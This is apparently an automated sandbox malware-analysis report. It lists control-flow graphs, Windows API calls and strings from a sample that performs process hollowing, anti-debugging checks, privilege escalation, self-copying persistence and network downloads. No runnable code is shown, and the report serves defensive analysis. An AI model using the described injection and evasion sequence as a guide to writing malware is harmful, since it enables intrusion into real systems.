                                                                                                                                                                                                                          control_flow_graph 231 7ff7dbd52048-7ff7dbd520c2 GetModuleFileNameW 232 7ff7dbd520c9-7ff7dbd52105 231->232 233 7ff7dbd520c4 231->233 235 7ff7dbd5211d-7ff7dbd52139 call 7ff7dbd51f88 232->235 236 7ff7dbd52107-7ff7dbd5210f 232->236 234 7ff7dbd5296d-7ff7dbd52975 233->234 245 7ff7dbd5217c-7ff7dbd52186 235->245 238 7ff7dbd5213b-7ff7dbd52157 call 7ff7dbd51fc8 236->238 239 7ff7dbd52111-7ff7dbd52119 236->239 238->245 242 7ff7dbd5211b-7ff7dbd52177 239->242 243 7ff7dbd52159-7ff7dbd52175 call 7ff7dbd52008 239->243 242->234 243->245 249 7ff7dbd5218d-7ff7dbd521e1 CreateProcessW 245->249 250 7ff7dbd52188 245->250 251 7ff7dbd521e8-7ff7dbd52228 CreateFileW 249->251 252 7ff7dbd521e3 249->252 250->234 253 7ff7dbd5222a 251->253 254 7ff7dbd5222f-7ff7dbd5224b GetFileSize 251->254 252->234 253->234 255 7ff7dbd5224d-7ff7dbd52255 254->255 256 7ff7dbd52257-7ff7dbd52262 CloseHandle 254->256 255->256 257 7ff7dbd52267-7ff7dbd5228f VirtualAlloc 255->257 256->234 258 7ff7dbd522a1-7ff7dbd522cc ReadFile 257->258 259 7ff7dbd52291-7ff7dbd5229c CloseHandle 257->259 260 7ff7dbd522ce-7ff7dbd522ec VirtualFree CloseHandle 258->260 261 7ff7dbd522f1-7ff7dbd5233f CloseHandle GetThreadContext 258->261 259->234 260->234 262 7ff7dbd52359-7ff7dbd523de ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 261->262 263 7ff7dbd52341-7ff7dbd52354 VirtualFree 261->263 264 7ff7dbd523f8-7ff7dbd52461 VirtualAllocEx 262->264 265 7ff7dbd523e0-7ff7dbd523f3 VirtualFree 262->265 263->234 266 7ff7dbd5247b-7ff7dbd524af WriteProcessMemory 264->266 267 7ff7dbd52463-7ff7dbd52476 VirtualFree 264->267 265->234 268 7ff7dbd524c9-7ff7dbd524d4 266->268 269 7ff7dbd524b1-7ff7dbd524c4 VirtualFree 266->269 267->234 270 7ff7dbd524e6-7ff7dbd524f9 268->270 269->234 271 7ff7dbd525a7-7ff7dbd525ee 270->271 272 
7ff7dbd524ff-7ff7dbd52588 WriteProcessMemory 270->272 275 7ff7dbd52600-7ff7dbd52613 271->275 273 7ff7dbd5258a-7ff7dbd5259d VirtualFree 272->273 274 7ff7dbd525a2 272->274 273->234 274->270 277 7ff7dbd52898-7ff7dbd5291c WriteProcessMemory SetThreadContext 275->277 278 7ff7dbd52619-7ff7dbd52668 RtlCompareMemory 275->278 279 7ff7dbd5291e-7ff7dbd52931 VirtualFree 277->279 280 7ff7dbd52933-7ff7dbd52943 ResumeThread 277->280 281 7ff7dbd5266c-7ff7dbd52695 278->281 282 7ff7dbd5266a 278->282 279->234 284 7ff7dbd5295a-7ff7dbd52967 VirtualFree 280->284 285 7ff7dbd52945-7ff7dbd52958 VirtualFree 280->285 286 7ff7dbd526a0-7ff7dbd526ae 281->286 282->275 284->234 285->234 287 7ff7dbd52893 286->287 288 7ff7dbd526b4-7ff7dbd5273f 286->288 287->277 289 7ff7dbd52751-7ff7dbd5275f 288->289 290 7ff7dbd5288e 289->290 291 7ff7dbd52765-7ff7dbd52798 289->291 290->286 292 7ff7dbd5279c-7ff7dbd5286f ReadProcessMemory WriteProcessMemory 291->292 293 7ff7dbd5279a 291->293 295 7ff7dbd52889 292->295 296 7ff7dbd52871-7ff7dbd52884 VirtualFree 292->296 293->289 295->290 296->234
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName
                                                                                                                                                                                                                          • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                          • API String ID: 514040917-3001742581
                                                                                                                                                                                                                          • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction ID: 2b7d6086123a64eb07d05fdb33156316ea74074a047eec94bda4df3ae2c22f26
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9332EA3260CAC586E774DB19E8947AEB7A1FBC9B44F904136DA9D83B68DF3CD4448B10

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 297 7ff7dbd5345c-7ff7dbd53472 call 7ff7dbd510a0 call 7ff7dbd5321c 302 7ff7dbd5347c-7ff7dbd534aa call 7ff7dbd54264 call 7ff7dbd53ce4 call 7ff7dbd53f14 297->302 303 7ff7dbd53474-7ff7dbd53476 ExitProcess 297->303 310 7ff7dbd534fb-7ff7dbd5350e call 7ff7dbd53f14 302->310 311 7ff7dbd534ac-7ff7dbd534bd call 7ff7dbd543a4 302->311 316 7ff7dbd5354c-7ff7dbd5355f call 7ff7dbd53f14 310->316 317 7ff7dbd53510-7ff7dbd53521 call 7ff7dbd543a4 310->317 318 7ff7dbd534bf-7ff7dbd534d0 call 7ff7dbd543a4 311->318 319 7ff7dbd534d2-7ff7dbd534d4 ExitProcess 311->319 329 7ff7dbd53561-7ff7dbd53572 call 7ff7dbd543a4 316->329 330 7ff7dbd535a2-7ff7dbd535b8 call 7ff7dbd53a74 call 7ff7dbd533ec 316->330 326 7ff7dbd5352b call 7ff7dbd5327c 317->326 327 7ff7dbd53523-7ff7dbd53525 ExitProcess 317->327 318->319 328 7ff7dbd534da call 7ff7dbd532ec 318->328 335 7ff7dbd53530-7ff7dbd53535 326->335 337 7ff7dbd534df-7ff7dbd534e4 328->337 339 7ff7dbd5357c call 7ff7dbd5327c 329->339 340 7ff7dbd53574-7ff7dbd53576 ExitProcess 329->340 349 7ff7dbd5360e-7ff7dbd536d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 330->349 350 7ff7dbd535ba-7ff7dbd535cb call 7ff7dbd543a4 330->350 341 7ff7dbd53537-7ff7dbd53542 Sleep 335->341 342 7ff7dbd53544-7ff7dbd53546 ExitProcess 335->342 344 7ff7dbd534f3-7ff7dbd534f5 ExitProcess 337->344 345 7ff7dbd534e6-7ff7dbd534f1 Sleep 337->345 348 7ff7dbd53581-7ff7dbd53586 339->348 341->335 345->337 351 7ff7dbd53588-7ff7dbd53593 Sleep 348->351 352 7ff7dbd53595-7ff7dbd53597 ExitProcess 348->352 355 7ff7dbd535cd-7ff7dbd535de call 7ff7dbd543a4 350->355 356 7ff7dbd535e0-7ff7dbd535e2 ExitProcess 350->356 351->348 355->356 359 7ff7dbd535e8 call 7ff7dbd532ec 355->359 361 7ff7dbd535ed-7ff7dbd535f2 359->361 362 7ff7dbd535f4-7ff7dbd535ff Sleep 361->362 363 
7ff7dbd53601-7ff7dbd53603 ExitProcess 361->363 362->361
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                          • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                          • API String ID: 613740775-1953711635
                                                                                                                                                                                                                          • Opcode ID: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
                                                                                                                                                                                                                          • Instruction ID: 7bc1d02335ad4e8b97b95c2784674a4ed88d5e506fa4d780a9d14b014f1f983e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C61D620A0CA4391FA6CBB39A895A7EA2E0AF86711FD01937D45F861F5DF2DE4059730

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 434396405-0
                                                                                                                                                                                                                          • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                                          • Instruction ID: 22913ba60b98153b1536a92fe97449f3459f758102b0e4d7c2b79b3fe6e36fa7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C631E33261CA8186E754AB59E49062EF7A0FBC6B90F905136FA8E43A78DF7CD4418B11

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7DBD53784
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53744: GetVolumeInformationW.KERNELBASE ref: 00007FF7DBD53801
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53744: wsprintfW.USER32 ref: 00007FF7DBD538A2
                                                                                                                                                                                                                          • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD5390D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53922
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53935
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53945
                                                                                                                                                                                                                          • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53958
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD5396D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53980
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53995
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: .exe

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7DBD53784
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53744: GetVolumeInformationW.KERNELBASE ref: 00007FF7DBD53801
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53744: wsprintfW.USER32 ref: 00007FF7DBD538A2
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD5390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53935
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD5396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53995
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32 ref: 00007FF7DBD53AB9
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE ref: 00007FF7DBD53AC4
                                                                                                                                                                                                                          • CopyFileW.KERNELBASE ref: 00007FF7DBD53ADD
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32 ref: 00007FF7DBD53AF5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: Services

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: %08lX%04lX%lu

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                          • String ID:

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 416 7ff7dbd51050-7ff7dbd5108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID:

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 420 7ff7dbd53b54-7ff7dbd53b7a VirtualAlloc
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4275171209-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 417 7ff7dbd53b24-7ff7dbd53b33 418 7ff7dbd53b48-7ff7dbd53b4c 417->418 419 7ff7dbd53b35-7ff7dbd53b42 VirtualFree 417->419 419->418
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                                                                          • API String ID: 2379135442-2896544425
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 4073123320-2766056989
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7DBD51D19
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                          • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                          • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2693768547-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD545C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53117), ref: 00007FF7DBD5460C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD545C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53117), ref: 00007FF7DBD54649
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD545C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53117), ref: 00007FF7DBD54654
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD5311C), ref: 00007FF7DBD53BC7
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53B84: RegSetValueExW.ADVAPI32 ref: 00007FF7DBD53BFD
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53B84: RegCloseKey.ADVAPI32 ref: 00007FF7DBD53C0C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF7DBD53C3C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7DBD53E37
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: Process32FirstW.KERNEL32 ref: 00007FF7DBD53E6A
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: CloseHandle.KERNEL32 ref: 00007FF7DBD53E7C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: wcscmp.MSVCRT ref: 00007FF7DBD53E91
